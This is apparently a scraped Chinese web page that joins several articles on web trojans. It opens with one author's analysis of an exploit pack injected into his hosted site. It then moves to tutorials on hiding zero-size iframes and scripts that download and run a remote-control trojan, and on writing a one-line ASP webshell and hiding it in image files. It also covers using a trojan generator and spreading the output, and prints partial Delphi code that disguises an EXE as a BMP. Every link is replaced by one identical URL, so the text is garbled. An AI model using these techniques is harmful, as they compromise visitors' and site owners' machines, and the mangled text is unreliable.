网页木马的研究分析

网页木马的研究分析
网页木马的研究分析

网页木马的研究分析(精品文章)

2008-10-14 21:13

今天给大家讲一讲网页木马的研究分析过程,目的在于让大家了解网页木马的运做过程,让大家加深理解。网马测试环境我使用了影子系统+Firefox这样的环境,影子系统具有很好的系统还原功能,适合各种病毒木马以及恶意代码的测试,而Firefox则是一款很不错的浏览器,Firefox能够防御一部分网页恶意木马的执行,建议大家在此环境下操作,使用Firefox浏览器来查看恶意网站的源代码,从而进行分析与研究。当然,本人可能技术不是很高超,如果你是高手,可以直接在自己的系统上测试,如果出现问题则使用手工查杀木马。

前两天我找到一个免费空间,发现该空间商提供的速度不错,而且不要求放置任何广告。处于学习研究的目的,我上传了自己的网站。运行了两三天吧,一直没什么问题,结果今天早晨打开网站的时候发现被挂马,其实判断起来最主要的特征首先就是被挂马的网页速度会很卡,因为恶意代码需要执行时间。然后查看我的网站首页源代码,发现了被该空间商在最上方添加恶意代码,形式如https://www.360docs.net/doc/ae8640321.html,/js/js.js,这种网马隐藏性比较高。一般的网马都是直接使用框架Iframe形式,挂载如***.html这样的文件,如果使用这种网马,你会在你的网页源代码里看到:

而使用JS的挂马形式则会体现为,https://www.360docs.net/doc/ae8640321.html,/js/js.js,不会直接出现如html等网页文件后缀,这种马的特点在于:1、不便于被管理员发现,因为网站中会有很多.js文件2、不会在浏览器状态栏里显示网马地址,而这个.js文件里的内容其实就是恶意网站的地址,只不过通过js文件的形式体现,其内容还是会出现***.html的网马地址。

其实像是免费空间这种东西,多是为了自己的利益,其典型就是要求放他们的广告,像我找到的这种空间,不但速度飞快,而且没有任何要求,只是要放置他们的流量代码。当时就觉的有蹊跷,提供免费空间的人无非就两种目的,一是宣传自己的空间,让别人购买。二是一些不怀好意的用途,比如给你挂个马什么的。这个站只要求放置他的流量代码,一个目的可能是等你的站流量大了,然后强制要求放他们广告,再一个就是利用你的站投放木马。记得,当时我还在自己的群里说过,“不会偷着给挂马什么的吧?”,结果果不其然。于是,我立刻停掉了自己的网站。

这种事我也不是第一次碰到,就前几天还碰到过一次,也是免费空间,不过

人家直接了当,申请完了之后,上传完网站,直接把马挂在你的首页上,大不了管理员发现不用了就是。虽然很可恶,但是这个空间的做法很无耻,还猫了一阵等你有流量了再挂。我想他也是真有耐心,天下之大,无奇不有。冒充某某IDC公司,把人家整站程序套到自己网站上,装上个马甲。

好了,说了怎么多,直是要给大家讲明个大概经过,好让大家以后有所防范。下面我们进入正题。

刚才讲了,这个马是通过JS文件形式投放的,所以我们通过查看被挂马的网页源代码后,得到这个JS文件的地址,然后把它放到浏览器里浏览一下。之后你就可以看到这个js文件里的内容,通过查看该文件,找到其网马地址为:https://www.360docs.net/doc/ae8640321.html,/dl10.htm,之后我们还是在浏览器里打开它,查看其源代码,发现,那么news.html就是真实的网马地址。当然,这个人采用了好几个网页来套用它的木马,也许你可能通过查看上面的js文件,得到的d110.htm就是直接的网马地址,那么你就不需要做下面的操作了。只不过这个人通过d110.htm 又转到了https://www.360docs.net/doc/ae8640321.html,/news.html上,所以我们再来打开这个地址,通过查看源代码我们得知了真实的网马代码,一般可能都通过加密,目的就是为了不让你查到木马文件源头。如果没有加密,你可以直接找到木马地址,比如https://www.360docs.net/doc/ae8640321.html,/muma.exe等等。如果经过加密,你则需要使用一定的手法来破解它,下面讲一讲常用的目的家密算法和破解过程。

常用的加密形式有:

Encode加密、VBS加密、unescape加密、Base64加密等等。

一般这些都是通过工具来加密的,不过都是采用如上的加密算法,有的可以使用一定的工具来解密,如通用网马解密程序等等

有一些加密算法可能是个人所写,使用上述方法可能无法解密,这时就需要一定的编程基础,不过万变不离其宗,大家可以举一反三。以前碰到过一个加密算法,作者使用var形式给加密部分配置了一个访问密码,不过密码都会在代码中出现,仔细的朋友发现并不难,除非他的代码采用C/S形式,不然都是可以破解的,破解时需要给这段代码加一个box属性,然后把密码带入其中。

经过对news.html的加密部分解密,得出了如下真实的网马代码:

注:处于安全考虑,以上网址经过处理。

其实到这里也并是完成了所有工作,因为通过查看代码我们发现,这个恶意网站并非是使用了一个网马,而是使用了时下流行的“网马聚合”形式,早期的网马都是单一地址,而现在的网马为了提高中马率,而使用这种在一个网页中嵌套多个网马。通过分析代码我们不难看出:ms06014.js、Thunder.html、GLWORLD.html、StormII.html、Real.html、real.js、Baidu.cab,这几个文件分别是利用了微软ms06014漏洞、迅雷漏洞、联众漏洞、暴风影音漏洞、RealPlayer漏洞、百度搜霸漏洞。如果你的系统安装了如上程序,版本又比较老,则有可能存在如上漏洞被恶意代码利用。

至于如何判断该网马是利用什么漏洞,这里我提供两种识别方法,一是直接看它的文件名,顾名思义。因为你整天用到这些软件,当你看到如Thunder.html这样的文件名,你不可能不知道这使迅雷漏洞网马。二是看代码属性,如var Baidu=new ActiveXObject("BaiduBar.Tool"),当你看到这个名称时,就不难想到BaiduBar.Tool是什么了,即使你不知道,到百度搜一搜我想也该明白。

其实每段网马代码中都会有clsid字段,这段代码中clsid字段值为:

BD96C556-65A3-11D0-983A-00C04FC29E36,将它拷贝到搜索引擎搜索一下,就会看到微软针对相应的漏洞名称和说明。针对微软的漏洞,修补起来只需要到微软官方网站下载相应漏洞补丁即可。针对各种应用软件的漏洞,如迅雷等,则需要关注其官方网站动态,即时更新下载最新版本。

有人说到这里是不是就讲完了,其实不然。通过上面说的,我们仍然没有得到真实的木马地址,虽然我们今天讲的是网马,可什么是网马?网马就是html形式的木马?它可以执行?高手可能闲我罗嗦,但为了照顾到大家,还是讲一讲。“网马”说白了其实就是利用各种软件漏洞所编写的网页代码,其形式可能是利用缓冲区溢出等等规则,针对一些软件代码上的不完善,这种漏洞代码就可以导致软件缓冲区溢出,然后把存放在服务器上的exe木马下载到你的电脑上执行,而并不是这种.htm或.asp的网页文件本身就可执行,它只不过是一个载体。

无论你系统是否存在漏洞,恶意代码都会被下载到你系统盘里的temp临时文件夹里,等待执行,如果用360等软件检测恶意程序时,可以发现它提示在temp 文件夹里发现可执行文件,一般都是*.tmp,如果你系统存在漏洞,则被执行然后下载恶意程序。如果你的系统不存在该漏洞,它将永远长眠。当然你可以手工来清除它,在浏览器属性里选择“删除临时文件”即可。如果你不删除,它也会在几天后自动清空。

如果你某天使用360等软件时发现这些文件,则有可能你已经浏览过恶意网站,这时就需要多加注意,在清除这些临时文件夹文件的同时,也要多留意自己的系统是否被安装木马。

我们分析找到的几个文件地址,Thunder.html等等,随便找一个在浏览器中打开,然后它的查看源代码,就可以在代码中发现

http:/\/\https://www.360docs.net/doc/ae8640321.html,/\muma.exe这样形式的文件(如果代码也经过加密则跳到上面步骤继续解密),这就罪魁祸首,前面做了那么多,就是为了要下载它到你们的电脑中执行。我们可以直接复制到浏览器进行把它保存到本地。如果你前面中了该木马,保存到本地后我们可以用杀软查一查毒,如果发现病毒名称,到百度搜一搜,我想可以很快找到木马清除办法。或者如果你的杀软查不出,则可以上报给你的杀毒软件公司,即可以得到奖励,又可以找到清除办法。

或许,你通过学习本文的方法,可以找到系统自身存在的漏洞,并及时修复。当然,如果你只是处于研究的目的,则可以搭建影子系统,在本地运行一下,通过辅助软件查找其控制端IP地址,上报给公安机关。你还可以找到其IP地址,然后进行反击的操作,当然作者不提倡这样,研究学习就好。这些内容我们就不再继续讲了,今天主要研究网马部分。

解析网页后门与网页挂马原理

解析网页后门与网页挂马原理 转自IT168 网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。 一、前置知识 网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。 网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。 二、网页挂马的类型 1、框架嵌入式网络挂马 网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下: 解释:在打开插入该句代码的网页后,就也就打开了https://www.360docs.net/doc/ae8640321.html,/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。下面我们做过做个演示,比如在某网页中插入如下代码: 在“百度”中嵌入了“IT168安全版块”的页面,效果如图1。(图1)

灰鸽子网页木马从原理、制作到防范

灰鸽子”网页木马从原理、制作到防范 如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么? 因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马 的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。

实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞 来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中“https://www.360docs.net/doc/ae8640321.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe 改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的…之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。

Web安全之网页木马的检测与防御

Web安全之网页木马的检测与防御随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。在Web安全的攻击种类中,网页木马一直是一个不容忽视的问题。黑客把一个木马程序上传到一个网站里面然后用木马生成器生一个网马,再上到空间里面,再加代码使得木马在打开网页里运行,从而获取用户的隐私信息。随着网页木马破坏性的增大,人们对网页木马的重视程度也在逐渐增加。 1网页木马简介 1.1网页木马的定义 网页木马是在宏病毒、木马等恶意代码基础上发展出来的一种新形态的恶意代码.类似于宏病毒通过Word 等文档中的恶意宏命令实现攻击.网页木马一般通过HTML 页面中的一段恶意脚本达到在客户端下载、执行恶意可执行文件的目的,而整个攻击流程是一个“特洛伊木马式”的隐蔽的、用户无察觉的过程,因此,国内研究者通常称该种攻击方式为“网页木马”. 目前,学术界对网页木马尚无一个明确的、统一的定义.Wiki 将它定义为一种用户不知情的下载,发生的场景可以是用户阅览邮件、访问网站页面以及点击一个欺诈性的弹出框时,等等,该定义属于字面解释,包括的内容比较宽泛,如利用社会工程学手段欺骗用户下载也属于其涵盖范围.此外,Wiki 还用Drive-by-Install 这一术语来表示下载并安装恶意程序的过程;Google 的Provos 等人将网页木马限定为客户端在访问页面时受到攻击并导致恶意可执行文件的自动下载、执行,该定义指出了“访问页面时受到攻击”和“自动下载、自动执行恶意可执行文件”两个关键点;UCSB 的Cova 等人进一步指出,网页木马是以一段JavaScript 代码作为攻击向量的一种客户端攻击方式,而实际上,还存在一些通过CSS 元素、VBScript 脚本发起攻击的网页木马。 综上所述,网页木马定义为:一种以JavaScript,VBScript,CSS 等页面元素作为攻击向量,利用浏览器及插件中的漏洞,在客户端隐蔽地下载并执行恶意程序的基于Web 的客户端攻击。 1.2网页木马的攻击流程 网页木马采用一种被动攻击模式(即pull-based 模式):攻击者针对浏览器及插件的某个特定漏洞构造、部署好攻击页面之后,并不像发送垃圾邮件那样主动将内容推送给受害用户(即push-based 模式),而是被动地等待客户端发起的页面访问请求.其典型攻击流程如图 1 所示:1. 客户端访问攻击页面;2. 服务器做出响应,将页面内容返回给客户端;3. 页面被浏览器加载、渲染,页面中包含的攻击向量在浏览器中被执行并尝试进行漏洞利用;4,5. 存在该漏洞的客户端被攻破,进而下载、安装、执行恶意程序。

一句话木马图片制作(三种方法)

图片木马制作的三种方法Copy命令制作 1.asp内容: 打开cmd,数据一下命令:

此时打开两个jpg文件,相比: 且打开可以像一样显示图像。 把以下代码放入目标网站,即可按asp执行。<% #include files=””%> Uedit32(转载):

本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误: Microsoft VBScript 运行时错误错误 '800a000d' 类型不匹配: 'execute' /news1/,行 3 所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码: 这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。 制作步骤: 一、前期准备 材料: 1.一张图片:

2.一句话木马服务器端代码: <%execute request("value")%>(其他的一句话也行) 3.一句Script标签: 4. 调用图片后门代码: 工具:UltraEdit

网页木马制作全过程(详细)

如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中 “https://www.360docs.net/doc/ae8640321.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的…之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录

实验12 网页木马

特洛伊木马 特洛伊木马(Trojan Horse)又称木马,是一种通过各种方法直接或者间接与远程计算机之间建立起连接,使远程计算机能够通过网络控制本地计算机的程序。这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈的大木马,假装作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全城饮酒狂欢。到午夜时分,全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌入,部队里应外合,焚屠特洛伊城。后世称这只大木马为“特洛伊木马”。如今黑客程序借用其名,有“一经潜入,后患无穷”之意。 通常木马并不被当成病毒,因为它们通常不包括感染程序,因而并不自我复制,只是靠欺骗获得传播。现在,随着网络的普及,木马程序的危害变得十分强大,概括起来,木马的危害有:窃取数据、接受非授权操作者的指令、篡改文件和数据、删除文件和数据、施放病毒、使系统自毁、远程运行程序、跟踪监视对方屏幕、直接屏幕鼠标控制,键盘输入控制、监视对方任务且可以中止对方任务、锁定鼠标键盘和屏幕、远程重启和关机、远程读取和修改注册表、共享被控制端的硬盘等。 远程控制概述。要了解木马,首先应了解远程控制。所谓远程控制,是指管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段,联通需被控制的计算机,将被控计算机的桌面环境显示到自己的计算机上,通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。这里的远程不是字面意思的远距离,一般指通过网络控制远端电脑。早期的远程控制往往指在局域网中的远程控制而言,随着互联网的普及和技术革新,现在的远程控制往往指互联网中的远程控制。当操作者使用主控端电脑控制被控端电脑时,就如同坐在被控端电脑的屏幕前一样,可以启动被控端电脑的应用程序,可以使用或窃取被控端电脑的文件资料,甚至可以利用被控端电脑的外部打印设备(打印机)和通信设备(调制解调器或者专线等)来进行打印和访问外网和内网,就像利用遥控器遥控电视的音量、变换频道或者开关电视机一样。不过,有一个概念需要明确,那就是主控端电脑只是将键盘和鼠标的指令传送给远程电脑,同时将被控端电脑的屏幕画面通过通信线路回传过来。也就是说,控制被控端电脑进行操作似乎是在眼前的电脑上进行的,实质是在远程的电脑中实现的,不论打开文件,还是上网浏览、下载等都是存储在远程的被控端电脑中的。远程控制必须通过网

网页挂马详细步骤教程

? ? 当前位置 : 主页 > 网络安全 > 黑客教程 > 网页挂马详细步骤教程 来源:互联网作者:佚名时间:04-30 13:19:33【大中小】点评:其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中: 其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简单的了,只要你懂点html语言 把下面这段代码插进网页中: 我来插入,理论上来说插到任何地方都行,只是不要把html语言给弄乱了就行 本来没有插进去的页面就是这样,不知道网易那里有没有弹出的广告了,好我们运行,注意到网页的左下角的网址变化 看到左下角了吧,那里在请求https://www.360docs.net/doc/ae8640321.html,,说明我们插入进去的页面也运行了,哦,还有个弹出的窗口,给我的工具拦了,我来刷新一次,看到吧 width="0" height="0" frameborder="0"就是大小高度的意思,我们把他设置为零,那我们就不能看到网页的内容了 看下一种方法,把原来插进去的清理掉先,等下那个文件还要用 方法二:这个就是脚本 我们做网页的时候就会加入很多网页特效,同样我们也可以用来打开我们的网马,那么浏览过机子就会中我们的网马了~ 学过java的都知道上面一段代码的意思了把!打开网站的同时也就打开了我们的

“网页木马攻击及防范”论文

张胜国 经济学院金融系0802班

网页木马攻击原理及防范方法 摘要:此文章主要介绍网页攻击的原理及防范方法。写此文章的主要原因是一是:近期小耗子木马案让我很吃惊,竟有那么多肉鸡;二是我国的木马产业已经达到百亿元(最近腾讯网上每天都会有此报告),太让人吃惊了;第三,更重的是我在校网站工作,做一名网站程序员,这要求我在以后工作中实施防范注意。 网页木马的攻击 一、网页木马的攻击原理() 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了浏览器的漏洞,让IE6浏览器在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,浏览器真的能自动下载程序和运行程序吗?如果浏览器真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,浏览器是禁止自动下载程序特别是运行程序的,但是,浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中“https://www.360docs.net/doc/ae8640321.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的…之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。 图1 网页木马示例 小提示:灰鸽子木马 为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,

网页挂马的流程

网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件,如果网站存在SQL注入漏洞,则比较容易取得一定的权限。如果在服务器上对网站目录等做了较严格的权限限制,也是比较容易取得Webshell权限,具有Webshell权限可以对网页文件进行修改,而挂马就是在网页中加入一些代码。这些代码往往是利用浏览器或者应用程序的漏洞,浏览者在访问这些网页时,往往会在不知不觉中去下载一些木马程序来执行。网站挂马的原理就是设置框架网页的宽度和高度为0,将一些恶意网页隐藏起来,用户访问网站时不容易觉察。目前在网络上有很多网页木马生成器,简称“网马生成器”,本案例以“Ms-0733网马生成器”为例,来讲解如何进行网站挂马攻击。 步骤一配置网页木马。在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端,然后直接运行“Ms-0933网马生成器”在网马地址中输入“https://www.360docs.net/doc/ae8640321.html,/test.exe”,如图1所示,然后单击“生成木马”即可生成一网页文件HACKLL.HTM。 配置Ms-0733网马生成器 步骤二修改网站网页文件。在网站首页文件index.asp中加入已经配置好的网页木马htm文件,一般通过在页面中加入“”来实现,如图2所示。 加入木马代码到正常网页 网页木马利用的是IE浏览器存在的漏洞,其网页木马最本质的东西有两个一个是脚本,另外一个是真正的木马服务端,利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。其网页木马文件中多是一些JavaScript代码,如图3所示。 网页木马源代码 测试网页木马是否能够正常执行。在未安装微软的MS0933补丁程序的虚拟机中打开浏览器,并在其中输入网页木马的地址,一会儿后,在控制端就看见肉鸡上线了。 大量传播网页木马。网页木马测试成功以后,就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上,只要访问者的系统未安装其网页木马利用的漏洞,如果系统未安装任何对网页木马进行防御的软件,则计算机感染网页木马的几率非常大。 J技巧 直接在网站进行“挂马”攻击,被攻击的对象只能是存在安全漏洞的计算机,且攻击时间不宜太长,否则极易被杀毒软件查杀。

网页挂马种类

国内资深安全专家详谈网页木马 诚信网安--子明 【https://www.360docs.net/doc/ae8640321.html, 专家特稿】当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷,形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播。 一、什么是网页木马 网页木马是利用网页来进行破坏的病毒,它包含在恶意网页之中,使用脚本语言编写恶意代码,依靠系统的漏洞,如IE浏览器存在的漏洞来实现病毒的传播。当用户登陆了包含网页病毒的恶意网站时,网页木马便被激活,受影响的系统一旦感染网页病毒,就会遭到破坏,轻则浏览器首页被修改,标题改变,系统自动弹出广告,重则被装上木马,感染病毒,使用户无法进行正常的使用。甚至会引起系统崩溃,敏感信息丢失等严重后果。由于脚本语言易于掌握,所以网页木马非常容易编写和修改,造成很难提取特征值,增加了杀毒软件查杀以及用户预防的困难。 目前的网页木马都是利用脚本语言、ActiveX、WSH等来实现对客户端计算机的远程操作,如改写注册表,添加、删除、更改文件夹等操作。网页病毒可以以此来达到传播的目的。 1.利用WSH(Windows Scripting Host Object R eference)等系统控件 WSH,是“Windows Scripting Host”的简称,可以直译为“Windows 脚本宿主”。在Windows系统中会默认安装,它是内嵌于Windows 操作系统中的脚本语言工作环境。 Windows Scripting Host 这个概念最早出现于 Windows 98 操作系统。微软在研发 Windows 98 时,为了实现多类脚本文件在Windows 界面或Dos 命令提示符下的直接运行,就在系统内植入了一个基于32 位Windows 平台、并独立于语言的脚本运行环境,并将其命名为“Windows Scripting Host”。WSH 架构于ActiveX 之上,通过充当 ActiveX 的脚本引擎控制器,WSH 为 Windows 用户充分利用威力强大的脚本指令语言扫清了障碍。 WSH也有它的不足之处,任何事物都有两面性,WSH 也不例外。WSH 的优点在于它使用户可以充分利用脚本来实现计算机工作的自动化;但也正是它的这一特点,使系统存在了安全隐患。计算机病毒制造者用脚本语言来编制病毒,并利用WSH 的支持功能,让这些隐藏着病毒的脚本在网络中广为传播。借助WSH的缺陷,通过JAVAScript,VBScript,ActiveX等网页脚本语言,可以改动受影响系统的注册表,利用服务器端脚本程序如:ASP,PHP等来记录访问网页者的相关信息,浏览之后,系统目录被完全共享;IP地址、访问时间、操作系统名称会被网页木马所记录,造成敏感信息的泄露。 2.Microsoft Internet Explorer等浏览器存在漏洞 3.脚本语言 用JAVA编制的脚本语言主要是Java Applet和Java Script。Applet是Java编写的小应用程序,不能独立运行,需要嵌入HTML文件,遵循标准,在支持Java的浏览器(如Microsoft Internet Explorer) 上运行,是Java一个重要的应用分支,它改变了传统网页呆板的界面,在WWW网页(Home Page / Pages)设计中加入了动画、影像、音乐等元素。 JavaScript是一种基于对象(Object)和事件驱动(Event Driven)并具有安全性能的脚本语言。使用它的目的是与HTML超文本标记语言、与Web客户交互作用。从而可以开发客户端的应用程序等。它是通过嵌入或文件引用在标准的HTML语言中实现的。它的出现弥补了HTML语言的缺陷,它是Java与HTML折衷的选择,具有基于对象、简单、安全、动态、跨平台性等特性。 ActiveX是Microsoft提出的一组使用COM(Component Object Model,部件对象模型)使得软件部件在网络环境中进行交互的技术。它与具体的编程语言无关。作为针对Internet应用开发的技术,ActiveX 被广泛应用于WEB服务器以及客户端的各个方面。同时,ActiveX技术也被用于方便地创建普通的桌面应用程序。在Applet中可以使用 ActiveX技术,如直接嵌入ActiveX控制,或者以ActiveX技术为桥梁,将其它开发

黑客技巧之利用图片做木马应用完全解析

黑客技巧之利用图片做木马应用完全解析 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE 的编码漏洞实现自动下载和执行。 然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JA V ASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP 文件,把它拷贝到TEMP目录。再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行。但是这种技术只能在Windows9X下发挥作用,对于Windows2000、WindowsXP来说是无能为力了。 看上去好象很复杂,下面我们一步一步来: EXE变BMP的方法 大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度,我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下: program exe2bmp; uses Windows, SysUtils; var len,row,col,fs: DWORD; buffer: array[0..255]of char; fd: WIN32_FIND_DATA; h,hw: THandle; begin if (ParamStr(1)’’) and(ParamStr(2)’’) then begin //如果运行后没有两个参数则退出 if FileExists(ParamStr(1)) then begin FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow; col := 4; while true do begin if (fs mod 12)=0 then begin len:=fs; end else len:=fs+12-(fs mod 12); row := len div col div 3; if row>col then begin 